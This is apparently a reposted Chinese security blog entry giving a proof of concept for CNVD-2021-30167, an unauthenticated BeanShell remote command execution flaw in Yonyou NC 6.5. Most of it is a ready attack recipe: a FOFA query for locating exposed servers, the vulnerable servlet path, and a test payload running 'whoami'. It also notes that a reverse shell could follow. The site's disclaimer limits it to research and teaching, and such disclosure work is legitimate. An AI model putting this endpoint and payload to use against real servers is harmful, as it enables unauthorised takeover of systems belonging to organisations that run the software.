用友-NCBeanShell远程命令执行 POC

2024年12月9日23:40:55评论13 views字数 261阅读0分52秒阅读模式

用友 NC 由于对外开放了 BeanShell 接口，攻击者可以在未授权的情况下直接访问该接口，并构造恶意数据执行任意代码从而获取服务器权限

影响版本

用友 NC 6.5 版本，漏洞编号：CNVD-2021-30167。

FOFA搜集

title=="YONYOU NC"

用友-NCBeanShell远程命令执行 POC

漏洞复现

POC

/servlet/~ic/bsh.servlet.BshServlet

用友-NCBeanShell远程命令执行 POC

接下来我们随便试一下命令执行

exec("whoami");

用友-NCBeanShell远程命令执行 POC

进一步可以反弹 Shell，因为没有授权，所以点到为止

原文始发于微信公众号（TOP网络安全）：用友-NCBeanShell远程命令执行

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

Argo Events权限管理不当漏洞

本文由 admin 发表于 2024年12月9日23:40:55
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
用友-NCBeanShell远程命令执行 POChttps://cn-sec.com/archives/2491107.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.